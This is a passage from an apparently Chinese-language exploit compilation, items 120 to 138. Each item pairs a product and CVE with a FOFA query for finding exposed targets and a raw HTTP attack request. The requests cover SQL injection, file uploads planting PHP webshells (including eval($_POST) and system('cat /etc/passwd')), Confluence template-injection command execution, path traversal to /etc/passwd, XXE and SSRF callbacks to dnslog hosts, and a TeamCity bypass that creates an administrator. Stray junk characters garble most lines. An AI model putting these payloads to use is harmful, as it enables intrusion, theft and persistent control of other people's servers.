- s# o2 z% V, w5 z1 MAccept: */*
0 C! W. f+ H' BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. }) l0 X/ N6 A
Accept-Encoding: gzip, deflate
0 U/ o6 x9 A: s7 mContent-Type: application/x-www-form-urlencoded;2 g( B; Y# _& h( J$ d" S3 L
Content-Length: 109' a' @' K; o  T
Origin: https://58.18.133.60:8443
4 p9 x/ R  Z7 r' A4 S( h; pReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php3 j- H# I8 {4 A# `" e8 {
Sec-Fetch-Dest: empty( i/ N# a- V/ g5 L
Sec-Fetch-Mode: cors) y1 V6 l* [! |6 o' `4 o
Sec-Fetch-Site: same-origin
  _! d0 y; c6 F$ a: i/ QX-Forwarded-For: 1.1.1.1
) r' L( F) H" l6 U; v3 lX-Originating-Ip: 1.1.1.1% r4 [* N7 v; x2 e. J# [
X-Remote-Ip: 1.1.1.18 \( |. }# [+ r. m" Y7 l5 D+ ?
X-Remote-Addr: 1.1.1.1  P" z# b2 V. K' O6 Z0 j
Te: trailers! |7 g% ^0 B' A( z8 w( s/ [& d# U
Connection: close
7 [, |6 G' g, i0 i6 U
1 l/ q- ]  U; T, A8 S. {& }src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
  L! o$ z( x- G' [  Z  v
; H* A" i& z0 K( C0 ?* R# ~
2 t( h$ B: @! `' R120. 北京百绰智能S40管理平台导入web.php任意文件上传3 \5 W1 C( p3 D! O8 @
CVE-2024-12535 V1 L) i% F0 Y8 `$ Z; E0 I0 Z9 R1 [
FOFA:title="Smart管理平台"* Z, X- l, E: ]' m7 `
POST /useratte/web.php? HTTP/1.1, W8 g! x( I1 W5 ?: S
Host: ip:port) u2 ?/ l2 j  O% y* q. s- Q
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db! @) i. h4 A' f5 p3 P0 X* h% k
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
, a: ?+ v' {! g9 x, E) jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ p/ N& o/ i6 b9 O' t- j/ m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* O2 ?. }) I, i9 ]2 H9 n
Accept-Encoding: gzip, deflate8 y( a  v$ S1 R: @+ L7 c. b
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793286 J4 X4 ~$ d$ [3 E% a
Content-Length: 597
0 C( N7 Z9 H# q$ `1 c0 OOrigin: https://ip:port+ t0 F: c0 E/ E( ]! ?
Referer: https://ip:port/sysmanage/licence.php. _- Y* H6 ]; }. {) R% F
Upgrade-Insecure-Requests: 1
* I. E5 c( t6 z& ESec-Fetch-Dest: document5 S* ^' W& ^7 q  i/ J' l
Sec-Fetch-Mode: navigate9 f0 i, P  e0 w& `( ^; j8 |+ O% `
Sec-Fetch-Site: same-origin
; m- `! U5 C# a- \% m. R: B& WSec-Fetch-User: ?1
. l5 {/ i# ?- D4 {9 \Te: trailers
, ~/ R% ?" V( C/ f0 e! P& v( iConnection: close
  u, a7 M9 Z4 N9 ^2 |; v5 V( f8 D, T7 q' o- F/ E1 Q, E
-----------------------------42328904123665875270630079328
  v# K9 o' q1 lContent-Disposition: form-data; name="file_upload"; filename="2.php"
  Q4 V) X/ O$ rContent-Type: application/octet-stream' r7 H0 ]# {) `: |4 O: {

: n  V, E% ^! L; d8 T3 ?<?php phpinfo()?>
6 P, V$ q. q+ M; O) \% W-----------------------------42328904123665875270630079328* V5 U+ R5 F* c2 n5 w
Content-Disposition: form-data; name="id_type"4 z+ ^2 U  G8 B+ Q

2 j8 F# j3 r+ j: x* y9 d: A1
$ P# p4 g6 q6 W( W-----------------------------42328904123665875270630079328, D5 ~8 u4 T) _% J
Content-Disposition: form-data; name="1_ck"
8 u4 R# f! W3 X. \! a/ p6 `$ J2 n* @' ]: L7 U
1_radhttp
! R9 y' [, g: x+ X. ?-----------------------------42328904123665875270630079328
& o. B8 c+ Q4 \: o" U+ K9 SContent-Disposition: form-data; name="mode"1 R) i$ ?6 O" T9 \8 ~0 e  i

# @7 {0 C1 I% @: _% vimport
2 J- n2 P7 |& s8 L# X. y: Q/ m6 g-----------------------------42328904123665875270630079328
. y$ ~; t1 H0 T) v9 Y6 J) d  }- {1 b5 p

' @7 X1 T3 w( t  U$ ]  F! r文件路径/upload/2.php0 I0 Z% U- Z# e: L5 T" o
0 Q) F' Q9 e5 `4 W, `) q: j
121. 北京百绰智能S42管理平台userattestation.php任意文件上传% P; C* v. b/ x% I: L& ?
CVE-2024-1918! U; X1 g, u) w, K6 L
FOFA:title="Smart管理平台"
' O" O3 {' ~$ a) i. N5 qPOST /useratte/userattestation.php HTTP/1.1/ L  B7 x: e+ y
Host: 192.168.40.130:8443
' T; }9 E6 M0 Q. A4 S8 p1 b' Y4 tCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
* |9 [" F! N: i0 ~! q3 e: GUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko7 i; O* c! m5 g& {# z( ^5 _: F7 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 x- C9 S& g- A# i7 a0 E. gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; l# g8 y$ T) @0 I
Accept-Encoding: gzip, deflate6 v, P" A4 P% P, y$ O0 N! Z& }
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328: I9 u4 A0 L8 z5 l; w+ G
Content-Length: 592
0 A+ f. Q. f& \3 y; K4 Q1 OOrigin: https://192.168.40.130:8443
5 @8 _# V* {9 s* H; yUpgrade-Insecure-Requests: 1
/ d# W4 e3 |. Z. ?( u7 b- z7 rSec-Fetch-Dest: document
1 F, v  X  S3 N8 t# W  v+ MSec-Fetch-Mode: navigate
7 m6 L/ y  s" R: t5 j+ C8 w) k3 USec-Fetch-Site: same-origin
1 q; b% f3 N. v  a5 |Sec-Fetch-User: ?1; A/ p5 u$ ?2 `9 ^/ _+ u% \+ H" V$ @
Te: trailers
4 I2 `" _- L5 e! E% }Connection: close0 W6 j/ k# i; `! ^  p
( g# a2 D; I% p
-----------------------------42328904123665875270630079328
7 y8 c, m$ U' N# Q$ AContent-Disposition: form-data; name="web_img"; filename="1.php"
+ X- Q8 ?' @2 B4 U7 o# r/ i) z6 a/ NContent-Type: application/octet-stream
5 o: b. h: g- H, N+ t  h* T& \+ t; e' U% f" w' l9 k9 A; W9 W2 ?7 u  k6 @
<?php phpinfo();?>  U: y. d1 @2 q
-----------------------------423289041236658752706300793282 O, D- ?% e" L# v/ O$ u  f: U$ j# X
Content-Disposition: form-data; name="id_type"
1 n; z# }8 c; {- X% s5 }0 ~
; n8 o: a# J# z$ Q5 T6 s15 @8 S) K2 s2 H4 Z
-----------------------------42328904123665875270630079328
+ R. g3 w) ^' j  i- ]/ EContent-Disposition: form-data; name="1_ck"1 z- i& v+ R: @' P9 ]
) e4 N" Z" N8 j1 H
1_radhttp6 x! H+ j3 I( O" V* Y+ G- B3 S
-----------------------------42328904123665875270630079328) ~! a9 a% f, L2 N( q( L3 g- {( K
Content-Disposition: form-data; name="hidwel"
  y6 W/ [3 _& D2 T4 l7 S2 n9 ]8 Y- V5 J
set
9 D7 @, e4 L4 S5 P5 c3 T. e  E" L-----------------------------42328904123665875270630079328
( m( k, Y1 q4 k; C- ]! h
' S6 t, w! L/ A  m+ X: d& p  A& g% u* m
boot/web/upload/weblogo/1.php
9 ]9 |4 A2 G+ L0 r2 l6 S! v
% r  e3 E( A/ l- J122. 北京百绰智能s200管理平台/importexport.php sql注入: R8 |3 q  E2 X6 M4 Y0 J' `$ P
CVE-2024-27718FOFA:title="Smart管理平台"
5 w' \: K- l6 c1 U. ]- ?其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
7 Z2 X- T/ O# DGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1" o/ X# n' @- d0 n3 [. D
Host: x.x.x.x
0 A) C; `9 ]$ A& c% @1 F" LCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0% Y, q: b. d9 X) N8 l' T- ]% J: ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! z% \- C' h. }7 n0 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 d5 ?3 x9 |( m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ _8 T1 A) _- [! F( {Accept-Encoding: gzip, deflate, br3 t0 Y+ E& ]- A+ I5 e  B
Upgrade-Insecure-Requests: 1# o  r* `3 P- k. f$ L+ {
Sec-Fetch-Dest: document
( O& L) y2 i) f7 f3 mSec-Fetch-Mode: navigate
: A. n$ T0 {( `4 F* l  x: W& A9 z, ]4 }2 ySec-Fetch-Site: none! v; r" w8 \% p, o% R/ Q: Y* t
Sec-Fetch-User: ?1# I9 c# w; Q; L# r0 D( R
Te: trailers2 s  K6 A  x+ s6 F
Connection: close9 Q/ R3 q6 W0 ^, e2 c% ~2 |

8 o. M) }5 A- G( {! m$ D8 I, N- u
1 U. F: z8 A# R8 h123. Atlassian Confluence 模板注入代码执行" T  D$ ]8 `! _
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"1 S* X/ r- [, f  n& E$ M
POST /template/aui/text-inline.vm HTTP/1.16 I4 D# P7 I0 Q
Host: localhost:8090% n- D8 h3 F6 v# A- M
Accept-Encoding: gzip, deflate, br: s2 s! e# S! A0 _* D2 g. @1 h. \
Accept: */*
  k) Y6 A% V+ g7 D$ k% fAccept-Language: en-US;q=0.9,en;q=0.8
' Q% \- h/ x. Z2 i4 v& ?  UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
9 z2 z( j& u5 l) p; bConnection: close2 Q+ `8 E5 w8 N. ^# D6 G
Content-Type: application/x-www-form-urlencoded, N' c' x' @& F1 O
, A; @4 {( V# c% A: ?
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))1 Y1 b# Z2 F/ f

! h2 p. x3 M. E8 b; h: }+ I1 |6 R: F1 ~2 x% Y* G" M
124. 湖南建研工程质量检测系统任意文件上传  w9 ]5 C* L" `8 x& d
FOFA:body="/Content/Theme/Standard/webSite/login.css"
! b+ M( {3 F7 hPOST /Scripts/admintool?type=updatefile HTTP/1.1
3 H$ h  [, x" O' b$ ^Host: 192.168.40.130:8282- a5 r: X1 S! i8 u: \
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
% F/ k' P( d# I8 C; Z! ~! |# oContent-Length: 72
1 [& g( B4 Z6 @0 H5 [# QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8# t5 f5 e& v  F6 k
Accept-Encoding: gzip, deflate, br  _% Z& \% A9 A9 W- P6 v6 I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* ]3 `! g! o8 F3 S7 J5 OConnection: close' `/ a7 E/ o, G; a
Content-Type: application/x-www-form-urlencoded$ }' f( p+ V) s' M& E7 t' m! t
3 R; r1 f* }, y& A
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>1 Q( A! d! i4 i9 @* @, j3 p3 g

( Z0 L5 r+ q9 q! R6 w( p4 f& Y; s; o( L# }1 x. T" P  X
http://192.168.40.130:8282/Scripts/abcgcg.aspx* A- r+ Y3 j2 V( ^2 L( r9 y9 `
, [5 o& ]! f2 t1 L5 _% s( d
125. ConnectWise ScreenConnect身份验证绕过
. \$ `% \+ [1 e$ n2 N: t% BCVE-2024-17090 C0 Z. v$ N# r" g0 W) V
FOFA:icon_hash="-82958153"
8 x, _, k) n! e( J9 ?https://github.com/watchtowrlabs ... bypass-add-user-poc3 y# E, P4 f. V, w8 @/ v# F" O

) B2 i8 ]) i- E- w) u1 |& C; y
) P/ U% h& ^1 E" X, w使用方法/ Q1 ~. g& G" A. b5 x
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!' I& }. T0 E( s8 ^& i+ ^

( S: k( f  H) _$ _" v. j( d
( j7 M' g- s# `6 m: C0 Y创建好用户后直接登录后台,可以执行系统命令。
; }# E- d- e7 Y' r0 f4 Q$ b0 o1 ?- [% J* ^
126. Aiohttp 路径遍历' E7 F$ a2 f3 J2 E3 A! G' D
FOFA:title=="ComfyUI"
4 I6 ^7 l' D8 h# Z% FGET /static/../../../../../etc/passwd HTTP/1.1
9 G$ H2 k4 s$ w" U+ p: L6 {Host: x.x.x.x4 @0 z6 Q/ A+ j9 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, u9 I2 ~9 e- {* L1 u
Connection: close' K: A5 i( M9 m! ]1 e" X
Accept: */*0 N! }- ^3 E  j5 ]1 w4 A
Accept-Language: en% \* n. Z' o& T4 ?6 R* Z, I
Accept-Encoding: gzip
, h' V# R2 e4 I' X1 n; [, A% o1 k
; _) D6 h' h8 L$ B
; b4 z/ ]7 ~7 a127. 广联达Linkworks DataExchange.ashx XXE
8 R& U8 W% F+ z' FFOFA:body="Services/Identification/login.ashx"
0 }( s. V8 E# d$ i- U  NPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1! j$ }* B# U6 A0 m
Host: 192.168.40.130:88884 u+ R# s0 [+ M3 h9 V4 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36( l: B/ l2 F2 Z' @; y# m; G2 P
Content-Length: 415
  p8 G5 q3 M) }9 q+ R( r3 D) BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" d' |3 q, `4 P5 ~
Accept-Encoding: gzip, deflate& z9 z, h6 m0 r* G8 a
Accept-Language: zh-CN,zh;q=0.9& t( t( m- @; w
Connection: close
2 D0 R9 E. |8 N7 rContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
# Y) b3 A. Q  ^. G& e7 ^$ dPurpose: prefetch
. A4 w6 a7 t# b: P4 k- uSec-Purpose: prefetch;prerender& O# ~* L+ ]3 d! c

3 K5 D& \7 M; x, Q( K+ U% u------WebKitFormBoundaryJGgV5l5ta05yAIe0; O) o# m  L4 ~  s" D% `
Content-Disposition: form-data;name="SystemName"/ h+ `& K! J, T
3 k' W. i+ t' g, U7 g3 ^2 _5 F
BIM
- z, j/ ^2 M1 w9 h------WebKitFormBoundaryJGgV5l5ta05yAIe0; }  T6 E0 M: _
Content-Disposition: form-data;name="Params"6 C7 ?/ V1 i& n* i
Content-Type: text/plain
3 _* Y# \  K7 l% ?. c/ }. E1 \2 i! ?8 ~5 E# f
<?xml version="1.0" encoding="UTF-8"?>; H# r: B% T$ F1 X( u7 O: z% V
<!DOCTYPE test [& i4 ]0 e. C8 o, z" j. w
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
# Z! l' t+ A6 [- b]( C8 J3 s' M: A6 E) G  ]! S0 Q
>7 D0 M3 d1 T( c
<test>&t;</test>
/ q. a3 D3 _3 D: n------WebKitFormBoundaryJGgV5l5ta05yAIe0--
3 p/ ^% M# s4 g; A! L6 z5 ?) X) }8 w: S5 ?
2 Z' L9 l, x0 [3 w& B' h! d! }4 z
4 V; j& g) s+ a& i' `# ?5 H- T
128. Adobe ColdFusion 反序列化
8 Y4 P& I! G8 n* f/ s6 oCVE-2023-38203
$ J3 I  W9 `5 y) W% D* J' UAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
7 v6 v0 N' ^; XFOFA:app="Adobe-ColdFusion"
& i: B- y1 I# ~( }6 {0 lPAYLOAD
: Q* p  ?& ?8 W! t6 T) W' ~) s' L( B. d  K7 O) T# ^
129. Adobe ColdFusion 任意文件读取
* l( t) I: `, nCVE-2024-20767$ I1 d! c+ D. E
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"5 ?9 O* e& F" v7 T. P5 C
第一步,获取uuid9 `7 A2 o* B, v% Z# o) _" ^4 ~
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.16 m  y$ a: ^# u; x5 D
Host: x.x.x.x1 _) d! V/ Y" }" x: U4 U1 |, B2 s' Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.369 {$ v  @( o9 d- R5 g9 t, N# K
Accept: */*+ c$ P. Q, Z& x- @* Y
Accept-Encoding: gzip, deflate; @8 p% A% M3 B3 n
Connection: close( Y9 K) P9 S+ J* p1 t& j6 m' z
5 g- F- C7 w9 ^' K- ~! }
' o: _4 N7 ]- d3 c8 z
第二步,读取/etc/passwd文件3 Z) ?, c9 L0 l; F+ t( J8 z
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
( R% X/ f3 G# w  ~Host: x.x.x.x0 j/ W8 W- T5 G+ Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36( [1 m* O  Z, w4 H/ H
Accept: */*
9 W( U7 Y' t0 ~; M# ~6 b, MAccept-Encoding: gzip, deflate
* v. @( q5 E1 ^0 n8 L! E1 I$ pConnection: close( T: n: `; y. b1 ]8 j0 V
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
( P" s3 }' F2 V4 P2 D+ y2 M$ L4 g' l& {) u/ G3 v
% _# c7 t- r3 D+ E) E
130. Laykefu客服系统任意文件上传
+ _1 m; @4 s* ~; gFOFA:icon_hash="-334624619"
' \5 y/ {$ S% xPOST /admin/users/upavatar.html HTTP/1.1
+ e( K: L5 ]' P; a" g6 W' }Host: 127.0.0.1
: E9 k' y$ W8 n% r' K, eAccept: application/json, text/javascript, */*; q=0.01+ {, O) {3 E. }, ~( f0 A6 o
X-Requested-With: XMLHttpRequest
# Q3 [; g0 J- k5 g" s: ?User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.260 y# A8 j5 i4 a4 k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR) n/ J' a9 n8 I$ u) v
Accept-Encoding: gzip, deflate* j) n9 `. c) [
Accept-Language: zh-CN,zh;q=0.9
, c5 a, B5 j+ _( E$ m* PCookie: user_name=1; user_id=38 R  Q, ?9 {$ d( m
Connection: close1 M3 g$ X) g& b2 E7 H* V

& x, n/ [- }% ^+ Q, N8 |# b------WebKitFormBoundary3OCVBiwBVsNuB2kR
: Q: W& F# H7 \& j& e. q  e. S3 |Content-Disposition: form-data; name="file"; filename="1.php"! c- v7 G, J2 J; g
Content-Type: image/png3 H& k! g9 n3 U: W8 K0 E6 \

6 p8 {, {! b9 Y9 P. s) S, I+ a<?php phpinfo();@eval($_POST['sec']);?>
0 C! a3 N% d, ?/ B3 a------WebKitFormBoundary3OCVBiwBVsNuB2kR--- p  }* `/ S) o5 B3 |0 v3 R; E6 b
; Y2 y- ^. ^2 \. y; U5 b/ {* g
' Q3 S) k: I. i8 r4 p4 A$ @+ n+ r
131. Mini-Tmall <=20231017 SQL注入& y, `( o& k' t- }: C
FOFA:icon_hash="-2087517259"
/ B+ w* B4 {9 d& j- k8 N& ~; `, w后台地址:http://localhost:8080/tmall/admin. l5 e# C- r9 J* w
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)# L# \/ P4 q3 H

# X/ j' a! s: |2 J1 L3 T9 \+ I132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
( [/ _- ~+ M4 Z8 {CVE-2024-27198. |) s7 z4 o# c
FOFA:body="Log in to TeamCity"' \5 O; V3 r+ p
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
( m' P* ~$ T; J* E; f4 ZHost: 192.168.40.130:81111 h1 E1 A. }% O8 X: V5 d' X! D7 Z/ X6 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 z6 h. H2 `( nAccept: */*
/ @: |+ [  m2 d' m3 pContent-Type: application/json( U9 T) t6 C5 f0 n' t  f: l: _
Accept-Encoding: gzip, deflate
& q3 g! }& i' M1 K: I* Z4 D6 Y0 i) K
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}- [% A3 z* N9 z; x  i5 B4 i7 x

6 }/ V/ B, C6 l  u. H& r
/ y) E) A: l) `* \5 X) SCVE-2024-27199
2 ^& S/ N  m, I' N/res/../admin/diagnostic.jsp! Y2 c) q. z5 j; ^  _2 ?# ~
/.well-known/acme-challenge/../../admin/diagnostic.jsp9 @/ I% ^( y+ T8 ^8 _  N
/update/../admin/diagnostic.jsp7 o$ y, u6 {8 k6 b) H, B- G

! j' t8 ~- I8 ]3 D: z: o. ~0 T- P8 G8 r
CVE-2024-27198-RCE.py
4 S0 |3 H1 \; ?' D$ |7 M  ]3 Z
$ F% M# \( I* D& T1 Z133. H5 云商城 file.php 文件上传" y# M  s! t& f9 g  @9 Z7 S! X
FOFA:body="/public/qbsp.php"/ q9 K' q3 f! P* N( Q
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
: A& P& M0 X$ J% l6 YHost: your-ip
4 R* i! D$ @, ^# Q5 I( W" PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# d* p$ R: W/ t1 R2 U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
+ m# l5 q/ H6 p7 x) N
" z5 H8 f) z0 n* U3 Q  g------WebKitFormBoundaryFQqYtrIWb8iBxUCx
" D' `0 {- }4 R6 U, u, SContent-Disposition: form-data; name="file"; filename="rce.php"
5 T6 ^. c7 P8 P# G3 g& rContent-Type: application/octet-stream
$ C3 l1 i9 \" x& y! f# ^' a
" g6 ?  |: _8 `3 u; D. ^' u; I<?php system("cat /etc/passwd");unlink(__FILE__);?>, e# f; L7 n9 Y) ~
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--3 l5 H# N+ z" }% I. q4 R
5 J  _# k! A8 G; ^6 t3 t1 K) G. {
% O: h" P1 @6 U8 z0 W- F  d
+ F2 F0 P! P1 a% z4 I3 b
134. 网康NS-ASG应用安全网关index.php sql注入. z. R7 g& A; n& s
CVE-2024-2330* ~% G: }" Z9 m; o. O+ u2 y# Q- Q
Netentsec NS-ASG Application Security Gateway 6.3版本
2 e% x$ e, S( ]( D5 S2 Z2 L2 o. ?( vFOFA:app="网康科技-NS-ASG安全网关"' y4 o  Y3 Z/ G
POST /protocol/index.php HTTP/1.1" w+ r9 L) X9 P- q/ x
Host: x.x.x.x
/ ]6 h" M" W5 m$ lCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de* Q) @8 l. Y1 w- l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0' W! ]! j: T, Y% x* B
Accept: */*
$ q2 s& K. Y  q6 Q" Q/ @  g* _  DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' U: x" \7 o7 D1 E: y) O1 I! C+ bAccept-Encoding: gzip, deflate) S4 \2 {, P2 N4 h
Sec-Fetch-Dest: empty
5 t6 k# T7 p3 W) s0 dSec-Fetch-Mode: cors
& ?! Y7 H5 a/ S, o: VSec-Fetch-Site: same-origin
' s4 C6 v+ |6 S6 ?" I4 X8 I: tTe: trailers9 v5 X: d+ a  X# n! U
Connection: close$ E7 L' K7 @* S+ w4 B1 C
Content-Type: application/x-www-form-urlencoded8 X$ B- J0 p4 c1 Q
Content-Length: 263. V. u4 o- D8 B+ G% ^' g+ Q' b
# m. Z! X& P/ o, ]9 v' u4 f* m
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
. k" j, R3 q- [- E8 h# z* H0 o# w" @5 Y; |0 ]. `" Y

$ I' g5 H$ {5 q135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
; @* q: L2 b. C: ?- jCVE-2024-20225 h) {* B  n8 G) O
Netentsec NS-ASG Application Security Gateway 6.3版本0 }5 J6 i# F$ }7 ~, _/ k
FOFA:app="网康科技-NS-ASG安全网关"
, w4 y7 q  W& V# V# iGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.10 r& H8 T, h* t
Host: x.x.x.x( O$ {# S. R1 x: D/ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ ^. Y- |: I2 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 a, ?$ F- q* s7 G
Accept-Encoding: gzip, deflate
. R/ O( }, Y. l" J4 C5 x: g; ?Accept-Language: zh-CN,zh;q=0.9) M' }5 B) L2 C. P2 n4 s% p
Connection: close
% L7 n! Q- d) y6 i# H3 @* f1 |+ w% X, [0 Z

1 x4 ?2 M6 j3 n- ^1 E4 n4 f4 f136. NextChat cors SSRF
. z% [4 E, r4 w' V; gCVE-2023-49785
5 O5 q) I- X+ D0 j  ~FOFA:title="NextChat"
  Z) [5 w4 k1 U2 M/ kGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1, e( o4 Y6 x4 \# U5 k' r
Host: x.x.x.x:10000
/ j' m( ?! F3 g7 T. E. V) fUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- C- K3 r: B5 A1 E' n" a- O: C! ^3 SConnection: close: R$ L  x; c  _) N" }
Accept: */*
) H6 i7 k9 }! ^6 A% g! P& vAccept-Language: en
! B. W2 {1 x0 a  p" C$ e( z9 |- mAccept-Encoding: gzip
6 c# `# b& V. [, B5 H9 `  b$ b1 F, ]/ c: O
9 t7 l- ]! X# |* t
137. 福建科立迅通信指挥调度平台down_file.php sql注入
0 [+ Y! F& t' P; }; A" s) D/ xCVE-2024-2620( I/ ~0 k: _5 x6 F+ v- _
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 a* S4 V  o, A& P9 sGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1, g4 A4 I7 x- {( `! {
Host: x.x.x.x* Z! S2 m; s0 L: I' M9 }: u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* }1 w4 e, b! ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& ?" t3 d7 o+ XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% g$ ~: p' k& Z& DAccept-Encoding: gzip, deflate, br
: D8 N! N4 y' Q  }1 u2 ^! e+ QConnection: close0 C  K) W+ p( r9 ]5 c' Q
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
- s: G) a2 g( t' ]Upgrade-Insecure-Requests: 1
6 Z) \" w3 m$ M# q0 O' A! w) ?1 n3 n8 {1 ]# i6 t/ ?4 O

: E. S8 X- q: S) D138. 福建科立讯通信指挥调度平台pwd_update.php sql注入; U! K1 Y, k, h) t7 ^  g5 {, k0 ^
CVE-2024-2621
% g$ _# W7 ~5 h, f4 S! \FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
